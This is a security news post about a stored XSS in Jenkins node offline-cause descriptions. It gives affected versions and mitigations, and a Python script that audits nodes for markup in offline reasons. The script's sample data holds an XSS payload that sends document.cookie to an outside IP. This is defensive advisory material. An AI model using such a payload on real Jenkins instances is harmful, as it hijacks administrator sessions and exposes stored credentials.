JustAppSec

Jenkins fixes stored XSS in node offline-cause description

Published 18 Feb 2026 · Source: Jenkins Security Advisory

TL;DR — Jenkins patched a stored XSS in the node offline-cause description: any user with the permission to mark a node offline could store a script in the free-text reason, and it then ran in the browser of anyone viewing that node in the Jenkins UI.

What happened

Jenkins is the most widely used open-source CI/CD automation server. Jenkins published a security advisory covering two core issues. The primary concern is a High-severity stored XSS: offline-cause descriptions, which Jenkins has defined as HTML since 2.483, are rendered as-is, so the free-text reason a user enters through "Mark temporarily offline" reaches the page without escaping.

The same advisory includes a Medium-severity issue where Run Parameter values can reference builds the submitting user cannot access, leaking limited build/job existence information.

Stored XSS in CI/CD dashboards is particularly impactful because the audience is typically administrators and release engineers, exactly the sessions an attacker wants to hijack: a script running as an administrator can reach job configuration, stored credentials and the script console.

Who is impacted

  • Jenkins weekly versions up to and including 2.550.
  • Jenkins LTS versions up to and including 2.541.1.
  • Greatest risk where users or automation hold Agent/Configure or Agent/Disconnect permission (Agent/Disconnect is what "Mark temporarily offline" requires) and higher-privileged users view the Jenkins UI.

What to do now

  • Upgrade to the fixed weekly or LTS release named in the advisory for the track you run, and confirm the version actually deployed after rollout rather than the one you pulled.
  • If you are on Jenkins 2.539 or later and cannot upgrade immediately, enforce Content Security Policy (CSP) as a temporary mitigation. CSP limits what an injected payload can execute but does not remove the unescaped output, so treat it as a stopgap rather than a fix.
  • Tighten RBAC around node (agent) management, in particular Agent/Disconnect, so fewer users and service accounts can write the offline-cause text at all.
  • Review the offline-cause descriptions already stored on your nodes; markup saved before the upgrade is evidence that someone tried to use the bug.
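Alongside the upgrade, a responder will want to know whether any node already carries a malicious offline-cause description. The script below is an added example written for this article, not code from Jenkins or from the advisory. It reads node status from the Jenkins REST endpoint `/computer/api/json` with a `tree` filter, flags any `offlineCauseReason` that contains an HTML tag, an inline event handler or a `javascript:` URI, and falls back to a constructed sample response so it runs offline. The field names `displayName`, `temporarilyOffline` and `offlineCauseReason`, the use of a user API token over HTTP basic auth, the regex heuristics and the sample node names and payload are all assumptions about a typical instance, not facts from the advisory.

```python
"""Audit Jenkins nodes for offline-cause text that contains HTML markup.

Added example for this article; not Jenkins project code. Assumes the
REST endpoint /computer/api/json exposes displayName, temporarilyOffline
and offlineCauseReason per node, and that a user API token works over
HTTP basic auth. The heuristics and sample data below are constructed.
"""
import base64
import json
import re
import sys
import urllib.request

# A plain-text maintenance note should never contain these. Any tag, an
# on*= event handler, or a javascript: URI is enough to flag the node.
SUSPICIOUS = re.compile(
    r"</?[a-z][a-z0-9-]*"       # start of an HTML tag, e.g. <img or </script
    r"|\bon[a-z]+\s*="          # inline event handler (onerror=, onload=, ...)
    r"|javascript\s*:",         # script URI scheme
    re.IGNORECASE,
)


def find_suspicious_offline_causes(payload: dict) -> list:
    """Return one finding per node whose offline reason looks like markup."""
    findings = []
    for node in payload.get("computer", []):
        reason = node.get("offlineCauseReason") or ""
        match = SUSPICIOUS.search(reason)
        if match:
            findings.append({
                "node": node.get("displayName"),
                "temporarilyOffline": bool(node.get("temporarilyOffline")),
                "match": match.group(0),
                "reason": reason,
            })
    return findings


def fetch_computers(base_url: str, user: str, api_token: str, timeout: int = 10) -> dict:
    """Fetch node status from a live Jenkins instance (assumed API shape)."""
    url = (base_url.rstrip("/")
           + "/computer/api/json?tree=computer[displayName,offline,"
             "temporarilyOffline,offlineCauseReason]")
    req = urllib.request.Request(url)
    cred = base64.b64encode(f"{user}:{api_token}".encode()).decode()
    req.add_header("Authorization", "Basic " + cred)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


# Constructed sample response, shaped like the assumed API output. win-02
# carries the kind of payload the unescaped rendering would have executed.
SAMPLE_RESPONSE = {
    "computer": [
        {"displayName": "Built-In Node", "offline": False,
         "temporarilyOffline": False, "offlineCauseReason": ""},
        {"displayName": "linux-01", "offline": True,
         "temporarilyOffline": True,
         "offlineCauseReason": "Disk replacement, back Monday"},
        {"displayName": "win-02", "offline": True,
         "temporarilyOffline": True,
         "offlineCauseReason": "maintenance <img src=x "
                               "onerror=\"fetch('//203.0.113.5/?c='+document.cookie)\">"},
    ]
}


def main(argv: list) -> int:
    # usage: audit_offline_causes.py https://jenkins.example user api-token
    if len(argv) == 4:
        payload = fetch_computers(argv[1], argv[2], argv[3])
    else:
        payload = SAMPLE_RESPONSE
    findings = find_suspicious_offline_causes(payload)
    for f in findings:
        state = "temporarily offline" if f["temporarilyOffline"] else "offline"
        print(f"[!] {f['node']} ({state}): matched {f['match']!r}")
        print(f"    reason: {f['reason']}")
    if not findings:
        print("no offline-cause descriptions containing markup")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with no arguments to see the constructed sample flagged, or with the base URL, user and API token of your instance to audit live nodes. The account used only needs read access to node status; a non-zero exit code makes it easy to wire into a scheduled check. The regex is deliberately broad (any tag counts), so expect to eyeball the matches rather than treat every hit as an incident.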

Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly; send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
